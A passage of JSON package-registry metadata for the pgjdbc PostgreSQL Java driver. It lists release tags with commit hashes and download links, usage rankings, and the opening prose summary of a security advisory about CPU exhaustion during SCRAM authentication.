367853ba6a5a9e5fba91bd","kind":"commit","published_at":"2006-05-22T10:08:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_316","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_316","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_316","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_316","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_316/manifests"},{"name":"REL8_1_406","sha":"6b082944901866105f620900867a0e7eb8b96d91","kind":"commit","published_at":"2006-05-22T10:08:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_406","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_406","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_406","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_406","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_406/manifests"},{"name":"REL8_1_405","sha":"5dbd05a49a9c17f00528d7c8d885cfdeaacf3ad9","kind":"commit","published_at":"2006-02-09T17:04:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_405","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_405","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_405","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_405","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_405/manifests"},{"name":"REL8_0_315","sha":"90ed05f956d7269066a591086d9431191affa7bb","kind":"commit","published_at":"2006-02-09T17:04:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_315","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_315","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_315","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_315","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_315/manifests"},{"name":"REL8_1_404","sha":"d3f28b54df40c3eae08305d51d0219c689de4797","kind":"commit","published_at":"2005-11-06T06:45:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_404","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_404","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_404","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_404","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_404/manifests"},{"name":"REL8_0_314","sha":"5f21e4fa065eeb8719ff8f0ce593c9337f9d0335","kind":"commit","published_at":"2005-11-06T06:41:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_314","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_314","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_314","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_314","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_314/manifests"},{"name":"REL8_0_313","sha":"9cac940139c5c0f95a18199600309ed276daf0d5","kind":"commit","published_at":"2005-10-07T06:08:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_313","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_313","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_313","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_313","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_313/manifests"},{"name":"REL8_0_312","sha":"3ae53db8d3ca58443540e6e371e14027d3d85a0b","kind":"commit","published_at":"2005-07-24T11:05:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_312","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_312","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_312","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_312","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_312/manifests"},{"name":"REL8_0_311","sha":"ac526695a77433ceea00e1f8b4a9ba710607d2f2","kind":"commit","published_at":"2005-04-11T04:45:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_311","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_311","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_311","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_311","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_311/manifests"},{"name":"REL8_0_310","sha":"29a41dac2a3025af1d759924fcbd688cd9c8ee25","kind":"commit","published_at":"2005-02-02T20:08:22.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_310","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_310","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_310","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_310","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_310/manifests"},{"name":"REL8_0_309","sha":"389b1a118b97418bd72ef30e4e6534d5987faa60","kind":"commit","published_at":"2005-01-17T11:09:41.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_309","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_309","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_309","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_309","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_309/manifests"},{"name":"REL7_4_1","sha":"2d3f36805608aa2a41d3fc85c7bc0c1e43dfb0b3","kind":"commit","published_at":"2003-12-18T04:18:15.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_1/manifests"},{"name":"REL7_4","sha":"76a1ece07b1d3f4110d6522ce7eaf9c382316125","kind":"commit","published_at":"2003-11-15T10:20:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4/manifests"},{"name":"REL7_4_RC2","sha":"00f63c8f0632ef0539d0cf0e6ac1f7ad00d28574","kind":"commit","published_at":"2003-10-30T12:18:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_RC2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_RC2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_RC2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC2/manifests"},{"name":"REL7_4_RC1","sha":"00f63c8f0632ef0539d0cf0e6ac1f7ad00d28574","kind":"commit","published_at":"2003-10-30T12:18:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_RC1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_RC1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_RC1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC1/manifests"},{"name":"REL7_4_BETA5","sha":"8115d542320a2c6cccb5e28640991b3bd6107ad6","kind":"commit","published_at":"2003-10-15T09:39:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA5/manifests"},{"name":"REL7_4_BETA4","sha":"67fffc6579b15aadb6567cdad3d7b07360f37912","kind":"commit","published_at":"2003-09-23T06:13:52.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA4/manifests"},{"name":"REL7_4_BETA3","sha":"3f65d0b145f09a2f9ed09f53500f63efde8eb3f4","kind":"commit","published_at":"2003-09-13T04:02:16.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA3/manifests"},{"name":"REL7_4_BETA2","sha":"7d4ef49d60406717eab1291c0cf6af65464e13bf","kind":"commit","published_at":"2003-08-26T06:50:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA2/manifests"},{"name":"REL7_3_5","sha":"b7556b365129f5076b40e8721a0b0318d4fb5ac3","kind":"commit","published_at":"2003-08-07T17:56:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_3_5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_3_5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_3_5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_5/manifests"},{"name":"REL7_4_BETA1","sha":"ad2546260b21f17f5ad096010f1a80790108f3cd","kind":"commit","published_at":"2003-07-24T00:30:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA1/manifests"},{"name":"REL7_3_4","sha":"433b7b97da262eb863e59b29161f9691a7e624c8","kind":"commit","published_at":"2003-07-23T23:34:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_3_4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_3_4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_3_4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_4/manifests"},{"name":"REL7_3_2","sha":"93d0ed7240e64ecfaaeb7e689594dc878125fd36","kind":"commit","published_at":"2003-01-14T09:40:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_3_2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_3_2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_3_2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_2/manifests"},{"name":"REL7_2_4","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_4/manifests"},{"name":"REL7_2_3","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_3/manifests"},{"name":"REL7_2","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2/manifests"},{"name":"REL7_2_RC2","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_RC2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_RC2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_RC2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC2/manifests"},{"name":"REL7_2_RC1","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_RC1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_RC1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_RC1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC1/manifests"},{"name":"REL7_2_BETA5","sha":"74b58ea9308a8d0afa06c4da53967eccbe10f955","kind":"commit","published_at":"2002-01-05T22:26:23.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA5/manifests"},{"name":"REL7_2_BETA4","sha":"7b96aee64942e2b041820d2c8a6a95c8ac79dfdb","kind":"commit","published_at":"2001-12-11T04:48:05.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA4/manifests"},{"name":"REL7_2_BETA3","sha":"855287de30b689e315b435f79f3b8fd066dd5ac8","kind":"commit","published_at":"2001-11-19T23:19:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA3/manifests"},{"name":"REL7_2_BETA2","sha":"42c01a77e1e0be5f5b2d631fef5b3d46c2dbb7c2","kind":"commit","published_at":"2001-11-02T23:51:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA2/manifests"},{"name":"REL7_2_BETA1","sha":"72a1e406d24746a658be7672b311a73bb3d815a3","kind":"commit","published_at":"2001-10-25T06:00:05.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA1/manifests"},{"name":"REL7_1_2","sha":"78eb5549506b35d6bd13b915f34c49ec604f1f7c","kind":"commit","published_at":"2001-05-12T20:45:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_2/manifests"},{"name":"REL7_1","sha":"2c56fd4ae7a9e300c5c5bba754659949874af2c2","kind":"commit","published_at":"2001-03-19T21:57:09.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1/manifests"},{"name":"REL7_1_BETA3","sha":"a55bb6d16837bda30929f56c9b866bcd98ffe87f","kind":"commit","published_at":"2000-12-28T23:56:46.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_BETA3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_BETA3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_BETA3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA3/manifests"},{"name":"REL7_1_BETA2","sha":"a55bb6d16837bda30929f56c9b866bcd98ffe87f","kind":"commit","published_at":"2000-12-28T23:56:46.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_BETA2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_BETA2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_BETA2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA2/manifests"},{"name":"REL7_1_BETA","sha":"422287392124727a6d1520a004d6892449c3474c","kind":"commit","published_at":"2000-11-25T04:32:12.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_BETA","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_BETA","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_BETA","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_BETA/manifests"},{"name":"REL7_0","sha":"00659bf1e495de76b0444a0baecb12516526595d","kind":"commit","published_at":"2000-05-05T07:35:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_0/manifests"},{"name":"REL6_5","sha":"a82d23e5c013587296f807ff3886359fd4941f96","kind":"commit","published_at":"1999-06-27T11:05:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL6_5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL6_5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL6_5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL6_5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL6_5/manifests"},{"name":"release-6-3","sha":"121396c2d9ba689d98fe0837be59ce628ae62c0e","kind":"commit","published_at":"1998-02-22T18:03:26.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/release-6-3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/release-6-3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@release-6-3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/release-6-3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/release-6-3/manifests"}]},"repo_metadata_updated_at":"2026-03-15T13:14:16.264Z","dependent_packages_count":3652,"downloads":null,"downloads_period":null,"dependent_repos_count":176054,"rankings":{"downloads":null,"dependent_repos_count":0.0044048806077133466,"dependent_packages_count":0.018420409814073994,"stargazers_count":10.616563151972386,"forks_count":6.4499465407671694,"docker_downloads_count":0.13995507021780132,"average":3.445858010675829},"purl":"pkg:maven/org.postgresql/postgresql","advisories":[{"uuid":"GSA_kwCzR0hTQS05OHFoLXhqYzgtOThwcc4ABWM0","url":"https://github.com/advisories/GHSA-98qh-xjc8-98pq","title":"pgjdbc: Unbounded PBKDF2 iterations in SCRAM authentication allows CPU exhaustion DoS","description":"## Summary\npgjdbc is vulnerable to a client-side denial of service during SCRAM-SHA-256 authentication.\n\n### Impact\nA malicious server can instruct the driver to perform SCRAM authentication with a very large iteration count.\nWith a large enough value, the client spends an unbounded amount of CPU time inside PBKDF2 before 